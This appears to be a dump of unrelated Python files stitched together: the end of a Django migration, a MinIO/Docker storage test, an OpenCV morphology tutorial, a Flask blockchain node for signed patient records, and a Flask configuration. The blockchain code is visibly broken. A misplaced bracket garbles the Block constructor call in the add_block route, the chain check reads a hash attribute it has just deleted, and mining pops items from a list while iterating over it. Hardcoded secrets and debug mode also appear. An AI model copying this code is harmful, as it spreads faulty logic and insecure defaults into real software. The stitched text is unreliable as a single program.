'grouping_function': ('django.db.models.fields.CharField', [], {'default': "'SUM'", 'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label_field': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'label_fields'", 'to': u"orm['crowdataapp.DocumentSetFormField']"}),
'magnitude_field': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'magnitude_fields'", 'null': 'True', 'to': u"orm['crowdataapp.DocumentSetFormField']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'sort_order': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'crowdataapp.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': "'128'"}),
'show_in_leaderboard': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['crowdataapp']
|
import os
import subprocess
import time
import unittest
os.environ["MANIWANI_CFG"] = "test/media-test-config.cfg"
from shared import app, db
from model.Media import storage
DOCKER_NAME = "minio-test-instance"
MINIO_START_CMD = "docker run -d -p 9000:9000 -e MINIO_ACCESS_KEY=minio -e \
MINIO_SECRET_KEY=miniostorage --name %s minio/minio server /data" % DOCKER_NAME
MINIO_STOP_CMD = "docker kill %s" % DOCKER_NAME
MINIO_REMOVE_CMD = "docker rm %s" % DOCKER_NAME
TEST_ATTACHMENT = "./test/test_img.jpg"
def minio_available():
try:
docker_images = str(subprocess.check_output(["docker", "images"]))
return "minio/minio" in docker_images
except FileNotFoundError:
# no docker?
return False
@unittest.skipUnless(minio_available(), "Minio not available")
class TestS3(unittest.TestCase):
def setUp(self):
db.create_all()
self._start_minio()
storage._s3_client.create_bucket(Bucket="attachments")
storage._s3_client.create_bucket(Bucket="thumbs")
def tearDown(self):
subprocess.run(MINIO_STOP_CMD.split())
subprocess.run(MINIO_REMOVE_CMD.split())
def test_add_attachment(self):
attachment = open(TEST_ATTACHMENT, "rb")
# set filename attribute since werkzeug sets that on its file objects and
# storage.save_attachment expects it to be there
attachment.filename = attachment.name
storage.save_attachment(attachment)
attachment.close()
db.session.commit()
def _start_minio(self):
subprocess.run(MINIO_START_CMD.split())
|
# ! You need to understand morphological transformations before understanding the code.
# * Please check the video for more information with link below.
# # Link is here: https://pythonprogramming.net/morphological-transformation-python-opencv-tutorial/
# * Check the documentation as well for function argument options.
# # Link is here: https://docs.opencv.org/master/d9/d61/tutorial_py_morphological_ops.html#gsc.tab=0
# * For Clarifications on Kernel and Convolation and the ones() usage on Dilation and Erosion.
# # Check it here: https://towardsdatascience.com/basics-of-kernels-and-convolutions-with-opencv-c15311ab8f55
# # Another one: https://github.com/atduskgreg/opencv-processing-book/blob/master/book/filters/blur.md
# # For Full Guide: https://www.pyimagesearch.com/2016/07/25/convolutions-with-opencv-and-python/
# # Visualization #1: https://compvisionlab.wordpress.com/2013/04/07/convolution-opencv/
# # Visualization #2 with OP Question: https://datascience.stackexchange.com/questions/23183/why-convolutions-always-use-odd-numbers-as-filter-size
# ! You need to have a little to more patience when reading these articles especially if you started off,
# ! with little knowledge to college level maths. (For atleast, by understanding them)
# From OpenCV Library, import only IMREAD_COLOR, destroyAllWindows, dilate, erode, imread, imshow, imwrite and waitKey.
from cv2 import (
IMREAD_COLOR,
destroyAllWindows,
dilate,
erode,
imread,
imshow,
imwrite,
waitKey,
)
from numpy import ones, uint8
# Constant
WINDOW_TITLES = ["Original", "Eroded", "Dilated"]
# Input your file path here.
IMAGE_PATH = "../0_assets/img_8.png"
# ! Modify your parameters here.
PROCESS_ITERATION = 3 # The no of items for both erode and dilate buffer.
MATRIX_SYMMETRIC_SIZE = 3 # * No of Col and Rows of the Kernel Matrix.
# Read an image with default color RGB metric.
original_image_buffer = imread(IMAGE_PATH, IMREAD_COLOR)
# ! About Kernel
# * You have to imagine that the whole pixel of the original image is a big matrix.
# * And a kernel which is basically a small matrix (preferrable odd),
# * has to traverse from left to right, top to bottom.
# The Covered Parts of the Big Matrix from Kernel * Actual Kernel = Summation of All Elements.
# Will the output / result of the middle pixel after calculation, this is called convulation.
# ! Check the link of Visualization #2 with OP Question on the top for the actual visualization.
# * For erosion, we have to use a (m x n) of matrix with a value of 1.
# * Because we only need to validate a certain pixel either 1 or 0. For Instance, 0 To Black, 1 To White for img_8.
# # More Information Here: https://stackoverflow.com/questions/62417509/why-do-we-use-an-array-of-ones-for-a-kernel-in-opencv.
kernel = ones(
(MATRIX_SYMMETRIC_SIZE, MATRIX_SYMMETRIC_SIZE), uint8
) # We have to ensure that the matrix values are indeed, pure unsigned integer.
# Using erode and dilate methods.
erode_buffer = erode(original_image_buffer, kernel, iterations=PROCESS_ITERATION)
dilate_buffer = dilate(original_image_buffer, kernel, iterations=PROCESS_ITERATION)
# Displaying the image with for loop to have a clean code.
for idx, eachBuffers in enumerate([original_image_buffer, erode_buffer, dilate_buffer]):
imshow(
"%s Image of %s | Processed with %s Iteration/s"
% (WINDOW_TITLES[idx], IMAGE_PATH, PROCESS_ITERATION),
eachBuffers,
)
if idx > 0:
imwrite("output_%s.png" % WINDOW_TITLES[idx].lower(), eachBuffers)
if waitKey(0):
destroyAllWindows()
|
#!/usr/bin/env python3
from hashlib import sha512
import json
import time
from app.db_utils import *
import app.rsa as rsa
from base64 import b64encode, b64decode
from Crypto.PublicKey import RSA
from flask import Flask, request
import requests
# A class that represents a Block, which stores one or more pieces of data, in the immutable Blockchain.
class Block:
# One or more pieces of data (author, content, and timestamp) will be stored in a block.
# The blocks containing the data are generated frequently and added to the blockchain, each with a unique ID.
def __init__(self, index, transactions, timestamp, previous_hash):
self.index = index
self.transactions = transactions
self.timestamp = timestamp
self.previous_hash = previous_hash
self.nonce = 0
# A function that creates the hash of the block contents.
def compute_hash(self):
block_string = json.dumps(self.__dict__, sort_keys=True)
return sha512(block_string.encode()).hexdigest()
# End of Block class.
# A class that represents an immutable list of Block objects that are chained together by hashes, a Blockchain.
class Blockchain:
# Difficulty of PoW algorithm.
difficulty = 2
# One or more blocks will be stored and chained together on the Blockchain, starting with the genesis block.
def __init__(self):
# Pieces of data that are not yet added to the Blockchain.
self.unconfirmed_transactions = []
# The immutable list that represents the actual Blockchain.
self.chain = []
self.create_genesis_block()
# Generates genesis block and appends it to the Blockchain.
# The Block has index 0, previous_hash of 0, and a valid hash.
def create_genesis_block(self):
genesis_block = Block(0, [], time.time(), "0")
genesis_block.hash = genesis_block.compute_hash()
self.chain.append(genesis_block)
# Verifies the block can be added to the chain, adds it, and returns True or False.
def add_block(self, block, proof):
previous_hash = self.last_block.hash
# Verifies that the previous_hash field of block to be added points to the hash of the latest block,
# and that the PoW that is provided is correct.
if (previous_hash != block.previous_hash or not self.is_valid_proof(block, proof)):
return False
# Adds new block to the chain after verification.
block.hash = proof
self.chain.append(block)
return True
# Serves as an interface to add the transactions to the blockchain by adding them
# and then figuring out the PoW.
def mine(self):
# If unconfirmed_transactions is empty, no mining to be done.
#import pdb
#pdb.set_trace()
print (self.unconfirmed_transactions)
if not self.unconfirmed_transactions:
return False
# Authenticate the unconfirmed_transactions
for i,transaction in enumerate(self.unconfirmed_transactions):
auth = self.authenticate_transaction(transaction)
if not auth:
insert_audit_trail(None,transaction["patient_id"],"patient", "User {} block was rejected, unauthenticated".format(transaction["patient_id"]))
print("Not authenticated, removing")
self.unconfirmed_transactions.pop(i)
else:
insert_audit_trail(None,transaction["patient_id"],"patient", "User {} block authenticated successfully".format(transaction["patient_id"]))
print("Transaction is authenticated")
try:
del transaction["record"]
except:
pass
# If unconfirmed_transactions is empty after auth, no mining to be done.
if not self.unconfirmed_transactions:
return False
last_block = self.last_block
# Creates a new block to be added to the chain.
new_block = Block(last_block.index + 1,
self.unconfirmed_transactions,
time.time(),
last_block.hash)
# Running PoW algorithm to obtain valid hash and consensus.
proof = self.proof_of_work(new_block)
# Verifies block can be added to the chain (previous hash matches, and PoW is valid), and adds it.
self.add_block(new_block, proof)
# Empties the list of unconfirmed transactions since they are now added to the blockchain.
self.unconfirmed_transactions = []
# Announces to the network once a block has been mined, other blocks can simply verify the PoW and add it to their respective chains.
announce_new_block(new_block)
# Returns the index of the block that was just added to the chain.
return new_block.index
# Proof of work algorithm that tries different values of nonce in order to get a hash
# that satisfies the difficulty criteria.
# Important to note that there is no definite logic to figure out the nonce quickly, simply brute force.
def proof_of_work(self, block):
block.nonce = 0
computed_hash = block.compute_hash()
while not computed_hash.startswith("0" * Blockchain.difficulty):
block.nonce += 1
computed_hash = block.compute_hash()
return computed_hash
# Adds a new transaction the list of unconfirmed transactions (not yet in the blockchain).
def add_new_transaction(self, transaction):
print (self.unconfirmed_transactions)
self.unconfirmed_transactions.append(transaction)
# Checks if the chain is valid at the current time.
@classmethod
def check_chain_validity(cls, chain):
result = True
previous_hash = "0"
for block in chain:
block_hash = block.hash
# Removes the hash attribute to recompute the hash again using compute_hash.
delattr(block, "hash")
if not cls.is_valid_proof(block, block.hash) or previous_hash != block.previous_hash:
result = False
break
block.hash = block_hash
previous_hash = block_hash
return result
# Checks if block_hash is a valid hash of the given block, and if it satisfies the difficulty criteria.
@classmethod
def is_valid_proof(cls, block, block_hash):
return (block_hash.startswith("0" * Blockchain.difficulty) and block_hash == block.compute_hash())
@classmethod
def authenticate_transaction(cls, block):
db_conn = get_db_conn()
res = get_public_key(db_conn, block["patient_id"])
pb_key = res[0]
return cls.verify_signature(block, pb_key)
# Verify document
@classmethod
def verify_signature(cls, block, pub_key):
content = block["record"].encode('utf-8')
signature = b64decode(block["signature"])
print (signature)
print (content)
pub_key = b64decode(pub_key)
#print (pub_key)
pub_key = RSA.importKey(pub_key)
verify = rsa.verify(content, signature, pub_key)
return verify
# Returns the current last Block in the Blockchain.
@property
def last_block(self):
return self.chain[-1]
# End of Blockchain class.
# Flask web application
# Creates a new Flask web app.
app = Flask(__name__)
# The node's copy of the blockchain.
blockchain = Blockchain()
# A set that stores the addresses to other participating members of the network.
peers = set()
# Creates a new endpoint, and binds the function to the URL.
@app.route("/new_transaction", methods=["POST"])
# Submits a new transaction, which adds new data to the blockchain.
def new_transaction():
insert_audit_trail(None,"System","System", "New block has been added to block chain")
tx_data = request.get_json()
# required_fields = ["author", "content"]
# for field in required_fields:
# if not tx_data.get(field):
# return "Invalid transaction data", 404
tx_data["timestamp"] = time.time()
print (tx_data)
blockchain.add_new_transaction(tx_data)
return "Success", 201
# Creates a new endpoint, and binds the function to the URL.
@app.route("/chain", methods=["GET"])
# Returns the node's copy of the blockchain in JSON format (to display all confirmed transactions/posts).
def get_chain():
# Ensures that the user's chain is the current (longest) chain.
consensus()
chain_data = []
for block in blockchain.chain:
chain_data.append(block.__dict__)
return json.dumps({"length": len(chain_data), "chain": chain_data})
# Creates a new endpoint, and binds the function to the URL.
@app.route("/mine", methods=["GET"])
# Requests the node to mine the unconfirmed transactions (if any).
def mine_unconfirmed_transactions():
insert_audit_trail(None,"System","System", "Start mining unconfirmed transactions")
result = blockchain.mine()
if not result:
return "There are no transactions to mine."
insert_audit_trail(None,"System","System", "Block #{0} has been mined".format(result))
return "Block #{0} has been mined.".format(result)
# Creates a new endpoint, and binds the function to the URL.
@app.route("/add_nodes", methods=["POST"])
# Adds new peers to the network.
def register_new_peers():
nodes = request.get_json()
if not nodes:
return "Invalid data", 400
for node in nodes:
insert_audit_trail(None,"System","System", "Adding new peer {} to the network".format(str(node)))
peers.add(node)
return "Success", 201
# Creates a new endpoint, and binds the function to the URL.
@app.route("/pending_tx")
# Queries unconfirmed transactions.
def get_pending_tx():
insert_audit_trail(None,"System","System", "Getting unconfirmed transactions for the network")
return json.dumps(blockchain.unconfirmed_transactions)
# A simple algorithm to achieve consensus to maintain the integrity of the system.
# If a longer valid chain is found, the chain is replaced with it, and returns True, otherwise nothing happens and returns False.
def consensus():
global blockchain
longest_chain = None
curr_len = len(blockchain.chain)
# Achieve consensus by checking the JSON fields of every node in the network.
for node in peers:
response = requests.get("http://{0}/chain".format(node))
length = response.json()["length"]
chain = response.json()["chain"]
if length > curr_len and blockchain.check_chain_validity(chain):
curr_len = length
longest_chain = chain
if longest_chain:
blockchain = longest_chain
return True
return False
# Creates a new endpoint, and binds the function to the URL.
@app.route("/add_block", methods=["POST"])
# Adds a block mined by a user to the node's chain.
def validate_and_add_block():
block_data = request.get_json()
block = Block(block_data["index"],
block_data["transactions"],
block_data["timestamp", block_data["previous_hash"]])
proof = block_data["hash"]
added = blockchain.add_block(block, proof)
if not added:
insert_audit_trail(None,"System","System", "The block was discarded by the node.")
return "The block was discarded by the node.", 400
insert_audit_trail(None,"System","System", "The block was added to the chain.")
return "The block was added to the chain.", 201
# Announces to the network once a block has been mined, should always be called after validate_and_add_block().
# Other blocks can simply verify the PoW and add it to their respective chains.
def announce_new_block(block):
for peer in peers:
url = "http://{0}/add_block".format(peer)
requests.post(url, data=json.dumps(block.__dict__, sort_keys=True))
# Runs the Flask web app.
app.run(port=8000, debug=True)
|
import os
from dotenv import load_dotenv
load_dotenv()
SECRET_KEY = 'development key' # keep this key secret during production
if os.getenv('FLASK_ENV') == 'development':
SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL')
else: # production
db_user = os.getenv('db_user')
db_pass = os.getenv('db_pass')
db_host = os.getenv('db_host')
db_port = '5432'
db_name = 'pinterest_dev'
SQLALCHEMY_DATABASE_URI = "postgresql+psycopg2://{}:{}@{}:{}/{}?sslmode=require".format(db_user, db_pass, db_host, db_port, db_name)
SQLALCHEMY_TRACK_MODIFICATIONS = False
DEBUG = True
AZURE_STORAGE_CONNECTION_STRING = os.getenv('AZURE_STORAGE_CONNECTION_STRING')
AZURE_STORAGE_REMOTE= os.getenv("AZURE_STORAGE_REMOTE")
SUBSCRIPTION_KEY = os.getenv('SUBSCRIPTION_KEY')
ENDPOINT = os.getenv('ENDPOINT')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.